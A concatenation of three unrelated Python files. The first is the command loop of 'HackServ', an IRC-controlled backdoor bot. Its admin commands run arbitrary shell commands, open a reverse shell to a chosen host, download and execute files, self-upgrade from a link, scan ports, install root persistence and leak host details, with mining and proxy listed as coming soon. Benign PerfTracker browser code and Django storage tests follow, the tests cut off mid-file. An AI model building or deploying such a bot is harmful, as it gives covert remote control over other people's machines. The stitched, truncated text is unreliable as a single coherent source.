                        '.fsdl' (run fileserver to download files from),
                        '.scan [ip] [comma seperated ports]' (nmap port scanner),
                        '.msg [target] [message]' (sends a msg to a user/channel),
                        '.ntc [target] [message]' (sends a notice to a user/channel),
                        '.join [channel]' (tells bot to join channel),
                        '.part [channel]' (tells bot to part channel),
                        '.pj [channel]' (tells bot to part then rejoin channel),
                        '.kick [channel] [nick] [reason]' (tells bot to kick a user from a channel),
                        '.mode [target] [mode]' (set mode on nick or channel),
                        '.nick [newnick]' (sets a new botnick),
                        '.raw [command]' (sends a raw command to the IRC server),
                        '.ls [dir]' (lists files in a directory),
                        '.dl [url] [file]' (downloads [url] and saves as [file]),
                        '.run [execute type]' [executable file]' (execute a file),
                        '.upgrade [link] [file]' (upgrades the hackserv.py file),
                        '.mining [start/stop]' (coming soon!),
                        '.proxy [start/stop]' (coming soon!),
                        '.persistence' (attempt to enable persistence) (requires root permissions),
                        'Hi [botnick]' (responds to any user saying hello to it),
                        'bye [botnick]' (tells bot to quit)
                        """
                    else:
                        helpmsg = """
                        '.help' (shows this message),
                        'Hi [botnick]' (responds to any user saying hello to it)
                        """
                    # Split on commas and send one NOTICE per entry; strip()
                    # removes the literal indentation inside the triple-quoted text.
                    helpmsg = [m.strip() for m in str(helpmsg).split(',')]
                    for line in helpmsg:
                        sendntc(line, name)
                        time.sleep(1)
                    sendntc(message, name)
                # Respond to '.ip' command from admin.
                if name.lower() == adminname.lower() and message.find('.ip') != -1:
                    ip = get('https://api.ipify.org').text
                    sendntc("My public ip address is: " + format(ip), name)
                # Respond to '.uptime' command from admin.
                if name.lower() == adminname.lower() and message.find('.uptime') != -1:
                    sendntc("My current uptime: " + format(uptime()), name)
                # Respond to '.uname' command from admin.
                if name.lower() == adminname.lower() and message.find('.uname') != -1:
                    sendntc("System Info: " + format(uname()), adminname)
                # Respond to '.username' command from admin.
                if name.lower() == adminname.lower() and message.find('.username') != -1:
                    sendntc("Username: " + format(username()), adminname)
                    sendntc("UID: " + format(guid()), adminname)
                # Respond to '.macaddress' command from admin.
                if name.lower() == adminname.lower() and message.find('.macaddress') != -1:
                    sendntc("Mac Address: " + format(macaddress()), adminname)
                # Respond to '.sysinfo' command from admin.
                if name.lower() == adminname.lower() and message.find('.sysinfo') != -1:
                    # One NOTICE per platform field, paced to avoid flood limits.
                    time.sleep(1)
                    sendntc("System: " + format(platform.system()), adminname)
                    time.sleep(1)
                    sendntc("Node: " + format(platform.node()), adminname)
                    time.sleep(1)
                    sendntc("Release: " + format(platform.release()), adminname)
                    time.sleep(1)
                    sendntc("Version: " + format(platform.version()), adminname)
                    time.sleep(1)
                    sendntc("Architecture: " + format(platform.architecture()[0]), adminname)
                    time.sleep(1)
                    sendntc("Machine: " + format(platform.machine()), adminname)
                # Respond to '.osversion' command from admin.
                if name.lower() == adminname.lower() and message.find('.osversion') != -1:
                    sendntc("OS Version: " + format(platform.version()), adminname)
                # Respond to '.memory' command from admin.
                if name.lower() == adminname.lower() and message.find('.memory') != -1:
                    if platform.system() == 'Linux':
                        message = "End of Memory Info."
                        linuxMemory()
                    else:
                        message = "Only Linux is currently supported."
                    sendntc(message, name)
                # Respond to '.mining' command from admin.
                if name.lower() == adminname.lower() and message.find('.mining') != -1:
                    target = message.split(' ', 1)[0]
                    nonExist(target, name)
                # Respond to '.proxy' command from admin.
                if name.lower() == adminname.lower() and message.find('.proxy') != -1:
                    target = message.split(' ', 1)[0]
                    nonExist(target, name)
                # Respond to '.persistence' command from admin.
                if name.lower() == adminname.lower() and message.find('.persistence') != -1:
                    # FIX: os.getuid() returns a numeric uid; the old comparison
                    # against the string 'root' was always False, so persistence
                    # could never be enabled.
                    if os.getuid() == 0:
                        message = "Attempting to create persistence."
                        persistence()
                    else:
                        message = "HackServ does not have 'root' permissions."
                    sendntc(message, name)
                # Respond to '.upgrade [link] [file]' command from admin.
                if name.lower() == adminname.lower() and message.find('.upgrade') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        message = "Update sucessful!"
                        uFile = target.split(' ', 1)[1]
                        target = target.split(' ')[0]
                        update_thread = threading.Thread(target=update, args=(target, uFile))
                        update_thread.start()
                    else:
                        message = "Could not parse. The command should be in the format of '.update [link] [file]' to work properly."
                    sendntc(message, adminname)
                # NOTE(review): a second '.dl [file] [link]' handler used to live
                # here; it duplicated the '.dl' handler above (re-downloading the
                # same file synchronously) and crashed on a 'taregt' typo, so it
                # has been removed.
                # Respond to '.chmd [file] [permissions]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.chmd') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        message = "File permissions changed!"
                        cmMod = target.split(' ', 1)[1]
                        cmFile = target.split(' ')[0]
                        chFileMod(cmFile, cmMod)
                    else:
                        message = "Could not parse. The command should be in the format of '.chmd [file] [permissions]' to work properly."
                    sendntc(message, adminname)
                # Respond to '.scan [target] [port(s)]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.scan') != -1:
                    target = message.split(' ', 1)[1]
                    if target.find(' ') != -1:
                        message = "nmap scan has completed!"
                        ports = target.split(' ', 1)[1]
                        target = target.split(' ')[0]
                        ports = [s.strip() for s in str(ports).split(',')]
                        for port in ports: # loops through comma seperated list of ports.
                            nmapScan_thread = threading.Thread(target=nmapScan, args=(target, port))
                            nmapScan_thread.start()
                    else:
                        message = "Could not parse. The command should be in the format of '.scan [targetIP] [comma,seperated,ports]' to work properly."
                    sendntc(message, adminname)
                # Respond to '.rsh [target] [port]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.rsh') != -1:
                    if enableshell: # If enableshell is True, you can use this command.
                        target = message.split(' ', 1)[1]
                        if target.find(' ') != -1:
                            port = target.split(' ', 1)[1]
                            target = target.split(' ')[0]
                            message = "[+] Reverse shell connection established with " + target + ":" + port + "!"
                            rshell_thread = threading.Thread(target=rShell, args=(target,port))
                            rshell_thread.start()
                        else:
                            message = "Could not parse. The command should be in the format of '.rshell [target] [port]' to work properly."
                        sendntc(message, adminname)
                    else:
                        sendntc("Shell commands are disabled!", adminname)
                # Respond to '.fsdl [target] [port]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.fsdl') != -1:
                    fileServer()
                # Respond to '.ls' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.ls') != -1:
                    # FIX: a bare '.ls' used to raise IndexError; fall back to the
                    # zero-argument form (also used at startup) when no dir given.
                    if message.find(' ') != -1:
                        fileList(message.split(' ', 1)[1])
                    else:
                        fileList()
                # Respond to '.cmd [shell command]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.cmd') != -1:
                    if enableshell: # If enableshell is True, you can use this command.
                        # FIX: same always-True / IndexError check as '.raw' above.
                        if message.find(' ') != -1:
                            shellcmd = message.split(' ', 1)[1]
                            message = "Shell> " + shellcmd
                            runcmd_thread = threading.Thread(target=runcmd, args=(shellcmd,))
                            runcmd_thread.start()
                        else:
                            message = "Could not parse. The command should be in the format of '.cmd [shell command]' to work properly."
                        sendntc(message, adminname)
                    else:
                        sendntc("Shell commands are disabled!", adminname)
                # Respond to '.cno [shell command]' command from admin.
                if name.lower() == adminname.lower() and message[:5].find('.cno') != -1:
                    if enableshell: # If enableshell is True, you can use this command.
                        if message.find(' ') != -1:
                            shellcmd = message.split(' ', 1)[1]
                            message = "Shell> " + shellcmd
                            runcmd_noout_thread = threading.Thread(target=runcmd_noout, args=(shellcmd,))
                            runcmd_noout_thread.start()
                        else:
                            message = "Could not parse. The command should be in the format of '.cno [shell command]' to work properly."
                        sendntc(message, adminname)
                    else:
                        sendntc("Shell commands are disabled!", adminname)
                # Respond to 'exitcode botnick' from admin.
                if name.lower() == adminname.lower() and message.rstrip() == exitcode + " " + botnick:
                    # NOTE(review): sendmsg is called with (message, target)
                    # everywhere else in this loop; confirm it has a default
                    # target, otherwise this one-argument call raises TypeError.
                    sendmsg("Okay, Bye!")
                    ircsend("QUIT Killed by " + adminname)
                    sys.exit()
        else:
            if ircmsg.find("PING") != -1: # Reply to PINGs.
                nospoof = ircmsg.split(' ', 1)[1] # Unrealircd 'nospoof' compatibility.
                ircsend("PONG " + nospoof)
                if debugmode: # If debugmode is True, msgs will print to screen.
                    print("Replying with '"+ nospoof +"'")
                lastping = time.time() # Set time of last PING.
        if (time.time() - lastping) >= threshold: # If last PING was longer than set threshold, try and reconnect.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print('PING time exceeded threshold')
            connected = False
            reconnect()
        if not ircmsg: # If no response from server, try and reconnect.
            if debugmode: # If debugmode is True, msgs will print to screen.
                print('Disconnected from server')
            connected = False
            reconnect()
try: # Here is where we actually start the Bot.
    if not connected:
        # Refuse to start without the configuration file.
        if not os.path.isfile('./hsConfig.py'):
            if debugmode: # If debugmode is True, msgs will print to screen.
                print("hsConfig.py does not exist. Exiting...")
            sys.exit()
        if debugmode: # If debugmode is True, msgs will print to screen.
            print("hsConfig.py found. Starting HackServ...")
        #fileList() # Get list of files in current directory.
        connect() # Connect to server.
except KeyboardInterrupt: # Kill Bot from CLI using CTRL+C
    ircsend("QUIT Terminated Bot using [ctrl + c]")
    if debugmode: # If debugmode is True, msgs will print to screen.
        print('... Terminated Bot using [ctrl + c], Shutting down!')
    sys.exit()
|
browser_base.py | #!/usr/bin/env python
from __future__ import print_function, absolute_import
# -*- coding: utf-8 -*-
__author__ = "perfguru87@gmail.com"
__copyright__ = "Copyright 2018, The PerfTracker project"
__license__ = "MIT"
"""
Base browser library
"""
import sys
import time
import tempfile
import re
import logging
import os
import threading
import traceback
import datetime
import platform
if sys.version_info[0] < 3:
import httplib
else:
import http.client as httplib
# time to wait for the incomplete requests
DEFAULT_NAV_TIMEOUT = 60.0
# time to wait for browser ajax activity (in seconds) to consider page load is fully complete
DEFAULT_AJAX_THRESHOLD = 2.0
"""
TODO:
- Network connection simulation (3G, LTE, etc) (Use tc on linux, pfctl on Mac ?)
- IE support (needed for Windows)
- handle 'Server not found'
"""
"""
Glossary
Browser classes:
BrowserBase class - base browser class representing API available to the library users
|- BrowserWebdriver - base class for webdriver (i.e. selenium) based browsers (Chrome, Firefox)
| |- BrowserChrome - Chrome browser
| `- FirefoxBrowser - Firefox browser
`- BrowserPython - Python browser
`- CPBase - Control Panel base class
Page classes:
PageStats - class collecting all the page request to given URL
Page - class describing a page request and response (i.e. navigation item in the prowser)
PageRequest - class describing individual sub-requests of a page (css, js, html, etc)
PageTimeline - represents page timeline
PageWithActions - represents some kind of the html page model with focus on actions (URLs)
"""
from .page import Page, PageStats, PageTimeline
################################################################
# Exceptions
################################################################
class BrowserExc(Exception):
    """Base class for all browser-module exceptions."""

    def __init__(self, msg=""):
        text = "%s" % msg
        Exception.__init__(self, text)
        # Human-readable message consumed by callers of the browser module.
        self.message = "browser module exception: " + text
class BrowserExcTimeout(BrowserExc):
    """Raised when a browser operation exceeds its time budget."""

    def __init__(self, msg=""):
        text = "%s" % msg
        BrowserExc.__init__(self, text)
        # Override the base message with a timeout-specific one.
        self.message = "browser module timeout: " + text
class BrowserExcNotImplemented(BrowserExc):
    # Marker exception; no raise sites are visible in this file -- presumably
    # used by browser backends for unimplemented optional hooks.
    pass
class BrowserExcNotSupported(BrowserExc):
    """
    Raise this exception if for instance given method is intentionally not supported in a class
    """
    def __init__(self):
        BrowserExc.__init__(self)
        # FIX: traceback.extract_tb() requires a traceback object and there is
        # none available here (nothing has been raised yet), so the old call
        # raised TypeError.  extract_stack() captures the raising call site
        # instead: limit=2 keeps [caller, this __init__], index 0 is the caller.
        frame = traceback.extract_stack(limit=2)[0]
        # frame[2] is the function name, frame[0] the file it lives in.
        self.message += "method %s is not supported in %s" % (frame[2], frame[0])
class BrowserExcError(BrowserExc):
    """Generic browser-module error carrying a caller-supplied message."""

    def __init__(self, message):
        BrowserExc.__init__(self)
        # Append the caller's text to the base "browser module exception: " prefix.
        self.message = self.message + message
################################################################
# Browser class
################################################################
# Per-engine instance counter used by BrowserBase._init_name() to build
# unique "engine#NN" names.
_browser_id = {}
class BrowserBase:
    """Abstract base browser.

    Implements the engine-independent machinery: navigation history and
    per-page statistics, optional telemetry logging, background navigation
    loops, and logging helpers.  Engine-specific behaviour is supplied by
    subclasses through the ``_browser_*`` / ``browser_*`` hooks, most of
    which raise NotImplementedError here.
    """
    engine = 'basebrwsr'

    def __init__(self, headless=True, resolution=(1440, 900), cleanup=True, telemetry_fname=None,
                 log_path='auto', nav_timeout=DEFAULT_NAV_TIMEOUT, ajax_threshold=DEFAULT_AJAX_THRESHOLD,
                 remote_connstring=None):
        self.history = []          # URLs already visited (used for cache warmup decisions)
        self.page_stats = {}       # Page.get_key() -> PageStats
        self._name = self._init_name()
        self.resolution = resolution
        self.driver = None
        self.display = None
        self.pid = None
        self.nav_timeout = nav_timeout
        self.ajax_threshold = ajax_threshold
        self.remote_connstring = remote_connstring
        if log_path == 'auto':
            self.log_path = tempfile.NamedTemporaryFile(delete=cleanup).name
        else:
            self.log_path = log_path
        if telemetry_fname:
            # FIX: buffering=0 is not allowed for text-mode files on Python 3
            # (ValueError: can't have unbuffered text I/O); line buffering
            # still keeps telemetry promptly flushed.
            self.telemetry_log = open(telemetry_fname, 'a', 1)
        else:
            self.telemetry_log = None
        if self.log_path:
            self.log_info("log path: %s" % self.log_path)
        self._browser_display_init(headless, resolution)
        self.pid = self.browser_start()
        if not self.pid:
            raise BrowserExc("Browser initialization failed")
        # RAM baseline; browser_get_ram_usage_kb() reports growth over this.
        self._base_rss_kb = self._browser_get_rss_kb()
        # looping
        self._loop_locations = []
        self._loop_stop = True
        self._loop_thread = None
        self._loop_sleep_sec = 0

    def _init_name(self):
        """Build a unique "engine#NN" instance name from the global counter."""
        global _browser_id
        count = _browser_id.get(self.engine, 0)  # renamed from `id` (shadowed builtin)
        _name = "%s#%02d" % (self.engine, count)
        _browser_id[self.engine] = count + 1
        return _name

    def __del__(self):
        try:
            self.browser_stop()
        except Exception:
            # Never let destructor errors (e.g. NotImplementedError from the
            # base-class browser_stop) propagate during garbage collection.
            pass

    # === browser* methods ===#
    def _browser_clear_caches(self):
        """
        clear browser caches
        """
        self.history = []

    def _browser_navigate(self, location, cached=True, name=None):
        raise NotImplementedError

    def _browser_wait(self, page, timeout=None):
        """
        wait for navigation request completion
        """
        raise NotImplementedError

    def _browser_warmup_page(self, location, name=None):
        """
        warmup (i.e. cache) a page
        """
        raise NotImplementedError

    def _browser_display_init(self, headless, resolution):
        return

    def _browser_get_current_url(self):
        raise NotImplementedError

    def browser_get_name(self):
        raise NotImplementedError

    def browser_get_version(self):
        raise NotImplementedError

    def browser_get_platform(self):
        # FIX: was `raise platform.platform()` -- raising a string is a
        # TypeError; the platform description must be returned.
        return platform.platform()

    def _browser_get_rss_kb(self):
        return 0

    def browser_get_ram_usage_kb(self):
        """RAM growth (KB) since the post-start baseline."""
        return self._browser_get_rss_kb() - self._base_rss_kb

    def browser_get_screenshot_as_file(self, filename):
        raise NotImplementedError

    def browser_get_page_timeline(self, page):
        return PageTimeline(page)

    def browser_start(self):
        raise NotImplementedError

    def browser_stop(self):
        """
        exit from the driver
        """
        raise NotImplementedError

    def browser_reset(self):
        """Reset cookies and connection pools"""
        pass

    # === domain methods === #
    def domain_get_cookies(self, url):
        raise NotImplementedError

    def domain_set_cookies(self, url, cookies):
        raise NotImplementedError

    def domain_set_cookie(self, url, key, val=None, path=None):
        raise NotImplementedError

    def domain_set_header(self, url, key, val):
        raise NotImplementedError

    def domain_set_session(self, url, session_id):
        raise NotImplementedError

    # ==== logging === #
    # The 'browser' extra carries the instance name into the log format.
    def log_debug(self, msg):
        logging.debug(msg, extra={'browser': self._name})

    def log_info(self, msg):
        logging.info(msg, extra={'browser': self._name})

    def log_warning(self, msg):
        logging.warning(msg, extra={'browser': self._name})

    def log_error(self, msg):
        logging.error(msg, extra={'browser': self._name})

    def event_log(self, p):
        if not self.telemetry_log:
            return
        self.telemetry_log.write(p.serialize())

    # === Navigation looping === #
    def _loop(self):
        """Background thread body: cycle through the loop locations until stopped."""
        try:
            while not self._loop_stop:
                for loc in self._loop_locations:
                    self.navigate_to(loc)
                    time.sleep(self._loop_sleep_sec)
        except httplib.BadStatusLine:
            pass  # server dropped the connection mid-request; just end the loop
        except RuntimeError:
            logging.error("traceback:\n" + traceback.format_exc())

    def loop_start(self, locations, sleep_sec=0):
        self.log_debug("loop_start():\n  %s" % "\n  ".join([str(loc) for loc in locations]))
        if self._loop_thread:
            self.loop_stop()
        self._loop_locations = locations
        self._loop_sleep_sec = sleep_sec
        self._loop_stop = False
        self._loop_thread = threading.Thread(target=self._loop)
        self._loop_thread.start()

    def loop_stop(self):
        self.log_debug("loop_stop()")
        self._loop_stop = True

    def loop_wait(self):
        self.log_debug("loop_wait()")
        self._loop_thread.join()
        self._loop_thread = None

    # === navigation API === #
    def navigate_to(self, location, timeout=None, cached=True, stats=True, name=None):
        """
        navigate to given url or page in cached/uncached mode
        """
        url = location.url if isinstance(location, Page) else location
        scheme = url.split(":")[0]
        if scheme not in ("http", "https", "file", "about", "chrome"):
            url = "http://%s" % url
        if isinstance(location, Page):
            location.url = url
        else:
            location = url
        if cached is None:
            self.log_info("Navigate to: %s" % url)
        else:
            self.log_info("Navigate to: %s %s" % (url, "CACHED" if cached else "UNCACHED"))
        # Warm the cache on first cached visit; drop caches when an uncached
        # visit targets a previously-seen URL.
        if cached and url not in self.history:
            self._browser_warmup_page(location, name=name)
        elif not cached and url in self.history:
            self._browser_clear_caches()
        p = self._browser_navigate(location, cached=cached, name=name)
        self._browser_wait(p, timeout=timeout)
        self.history.append(url)
        if stats:
            key = p.get_key()
            if key not in self.page_stats:
                self.page_stats[key] = PageStats(len(self.page_stats))
            self.page_stats[key].add_iteration(p)
        self.event_log(p)
        self.log_info("Navigation completed: %s %s, dur %d ms" % (url, "CACHED" if cached else "UNCACHED", p.dur))
        return p

    def navigation_reset(self):
        pass

    # === printing facilities === #
    @staticmethod
    def print_stats_title(title):
        print("")
        print(title.upper())
        print("=" * len(title))
        print("")

    def print_browser_info(self):
        raise NotImplementedError
##############################################################################
# Autotests
##############################################################################
if __name__ == "__main__":
    # Self-test: instantiating the abstract base class must fail with
    # NotImplementedError (browser_start is not implemented here).
    try:
        BrowserBase()
    except NotImplementedError:
        print("OK")
        sys.exit(0)
    sys.exit(-1)
|
tests.py | import errno
import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation, SuspiciousOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
# Matches the random 7-character alphanumeric suffix that storage appends to
# make colliding file names unique.
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
    """Tests for get_storage_class() lookup and its failure modes."""

    def test_get_filesystem_storage(self):
        """
        get_storage_class returns the class for a storage backend name/path.
        """
        resolved = get_storage_class('django.core.files.storage.FileSystemStorage')
        self.assertEqual(resolved, FileSystemStorage)

    def test_get_invalid_storage_module(self):
        """
        get_storage_class raises an error if the requested import does not exist.
        """
        msg = "No module named 'storage'"
        with self.assertRaisesMessage(ImportError, msg):
            get_storage_class('storage.NonExistingStorage')

    def test_get_nonexisting_storage_class(self):
        """
        get_storage_class raises an error if the requested class does not exist.
        """
        with self.assertRaises(ImportError):
            get_storage_class('django.core.files.storage.NonExistingStorage')

    def test_get_nonexisting_storage_module(self):
        """
        get_storage_class raises an error if the requested module does not exist.
        """
        msg = "No module named 'django.core.files.non_existing_storage'"
        with self.assertRaisesMessage(ImportError, msg):
            get_storage_class('django.core.files.non_existing_storage.NonExistingStorage')
class FileSystemStorageTests(unittest.TestCase):
    """Tests for FileSystemStorage deconstruction and lazy initialization."""

    def test_deconstruction(self):
        # Default instance deconstructs to the class path with only a location kwarg.
        path, args, kwargs = temp_storage.deconstruct()
        self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
        self.assertEqual(args, tuple())
        self.assertEqual(kwargs, {'location': temp_storage_location})

        # Explicit constructor kwargs round-trip through deconstruct().
        kwargs_orig = {
            'location': temp_storage_location,
            'base_url': 'http://myfiles.example.com/'
        }
        path, args, kwargs = FileSystemStorage(**kwargs_orig).deconstruct()
        self.assertEqual(kwargs, kwargs_orig)

    def test_lazy_base_url_init(self):
        """
        FileSystemStorage.__init__() shouldn't evaluate base_url.
        """
        storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
        # The lazy URL only blows up once it is actually resolved.
        with self.assertRaises(NoReverseMatch):
            storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
    @override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_on(self, getter):
        # `getter` is a bound storage method that takes a saved file name and
        # returns a timestamp (e.g. get_accessed_time).
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())
        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5. The following will be aware in UTC.
            now = timezone.now()
            self.assertFalse(self.storage.exists('test.file.tz.on'))
            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.on', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be aware, in UTC
            self.assertTrue(timezone.is_aware(dt))
            self.assertEqual(now.tzname(), dt.tzname())
            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)
            # dt and now should be the same effective time.
            # 2-second slack absorbs the save-to-getter delay.
            self.assertLess(abs(dt - now), timedelta(seconds=2))
    @override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
    def _test_file_time_getter_tz_handling_off(self, getter):
        # `getter` is a bound storage method that takes a saved file name and
        # returns a timestamp (e.g. get_accessed_time).
        # Django's TZ (and hence the system TZ) is set to Africa/Algiers which
        # is UTC+1 and has no DST change. We can set the Django TZ to something
        # else so that UTC, Django's TIME_ZONE, and the system timezone are all
        # different.
        now_in_algiers = timezone.make_aware(datetime.now())
        with timezone.override(timezone.get_fixed_timezone(-300)):
            # At this point the system TZ is +1 and the Django TZ
            # is -5.
            self.assertFalse(self.storage.exists('test.file.tz.off'))
            f = ContentFile('custom contents')
            f_name = self.storage.save('test.file.tz.off', f)
            self.addCleanup(self.storage.delete, f_name)
            dt = getter(f_name)
            # dt should be naive, in system (+1) TZ
            self.assertTrue(timezone.is_naive(dt))
            # The three timezones are indeed distinct.
            naive_now = datetime.now()
            algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
            django_offset = timezone.get_current_timezone().utcoffset(naive_now)
            utc_offset = timezone.utc.utcoffset(naive_now)
            self.assertGreater(algiers_offset, utc_offset)
            self.assertLess(django_offset, utc_offset)
            # dt and naive_now should be the same effective time.
            # 2-second slack absorbs the save-to-getter delay.
            self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
            # If we convert dt to an aware object using the Algiers
            # timezone then it should be the same effective time to
            # now_in_algiers.
            _dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
            self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
    """get_accessed_time() matches the filesystem atime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    saved_name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, saved_name)

    atime = self.storage.get_accessed_time(saved_name)
    expected = datetime.fromtimestamp(os.path.getatime(self.storage.path(saved_name)))
    self.assertEqual(atime, expected)
    self.assertLess(timezone.now() - self.storage.get_accessed_time(saved_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
    # get_accessed_time() must honor USE_TZ in both its states.
    self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
    """get_created_time() matches the filesystem ctime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    saved_name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, saved_name)

    created = self.storage.get_created_time(saved_name)
    expected = datetime.fromtimestamp(os.path.getctime(self.storage.path(saved_name)))
    self.assertEqual(created, expected)
    self.assertLess(timezone.now() - self.storage.get_created_time(saved_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
    # get_created_time() must honor USE_TZ in both its states.
    self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
    """get_modified_time() matches the filesystem mtime and is recent."""
    self.assertFalse(self.storage.exists('test.file'))
    saved_name = self.storage.save('test.file', ContentFile('custom contents'))
    self.addCleanup(self.storage.delete, saved_name)

    modified = self.storage.get_modified_time(saved_name)
    expected = datetime.fromtimestamp(os.path.getmtime(self.storage.path(saved_name)))
    self.assertEqual(modified, expected)
    self.assertLess(timezone.now() - self.storage.get_modified_time(saved_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_modified_time_timezone(self):
    # get_modified_time() must honor USE_TZ in both its states.
    self._test_file_time_getter(self.storage.get_modified_time)
def test_file_save_without_name(self):
    """save(None, content) falls back to the content object's .name."""
    self.assertFalse(self.storage.exists('test.file'))

    content = ContentFile('custom contents')
    content.name = 'test.file'

    stored_name = self.storage.save(None, content)
    self.assertEqual(stored_name, content.name)
    self.assertTrue(os.path.exists(os.path.join(self.temp_dir, content.name)))
    self.storage.delete(stored_name)
def test_file_save_with_path(self):
    """save() creates any missing intermediate directories."""
    self.assertFalse(self.storage.exists('path/to'))
    self.storage.save('path/to/test.file', ContentFile('file saved with path'))

    self.assertTrue(self.storage.exists('path/to'))
    with self.storage.open('path/to/test.file') as stored:
        self.assertEqual(stored.read(), b'file saved with path')

    full_path = os.path.join(self.temp_dir, 'path', 'to', 'test.file')
    self.assertTrue(os.path.exists(full_path))
    self.storage.delete('path/to/test.file')
def test_save_doesnt_close(self):
    """Storage.save() must leave the caller's upload object open."""
    def check_open_through_save(upload):
        # The caller owns the file object; save() must not close it,
        # nor the underlying file it wraps.
        self.assertFalse(upload.closed)
        self.storage.save('path/to/test.file', upload)
        self.assertFalse(upload.closed)
        self.assertFalse(upload.file.closed)

    with TemporaryUploadedFile('test', 'text/plain', 1, 'utf8') as upload:
        upload.write(b'1')
        upload.seek(0)
        check_open_through_save(upload)

    with InMemoryUploadedFile(StringIO('1'), '', 'test', 'text/plain', 1, 'utf8') as upload:
        check_open_through_save(upload)
def test_file_path(self):
    """path() returns the absolute filesystem location of a stored file."""
    self.assertFalse(self.storage.exists('test.file'))
    stored_name = self.storage.save('test.file', ContentFile('custom contents'))
    self.assertEqual(self.storage.path(stored_name), os.path.join(self.temp_dir, stored_name))
    self.storage.delete(stored_name)
def test_file_url(self):
    """url() joins base_url with a safely percent-encoded file name."""
    self.assertEqual(self.storage.url('test.file'), self.storage.base_url + 'test.file')

    # Special characters are encoded the way JavaScript's
    # encodeURIComponent() does it, leaving ~!*()' untouched.
    self.assertEqual(
        self.storage.url(r"~!*()'@#$%^&*abc`+ =.file"),
        "/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file"
    )
    self.assertEqual(self.storage.url("ab\0c"), "/test_media_url/ab%00c")

    # OS path separators are translated to the URL path separator.
    self.assertEqual(self.storage.url("""a/b\\c.file"""), "/test_media_url/a/b/c.file")

    # #25905: leading (back)slashes are stripped to prevent unsafe URLs.
    for unsafe_name in ("/evil.com", r"\evil.com", "///evil.com", r"\\\evil.com"):
        self.assertEqual(self.storage.url(unsafe_name), "/test_media_url/evil.com")

    self.assertEqual(self.storage.url(None), "/test_media_url/")
def test_base_url(self):
    """url() raises without a base_url and auto-appends a missing slash."""
    self.storage.base_url = None
    with self.assertRaises(ValueError):
        self.storage.url('test.file')

    # #22717: missing ending slash in base_url should be auto-corrected.
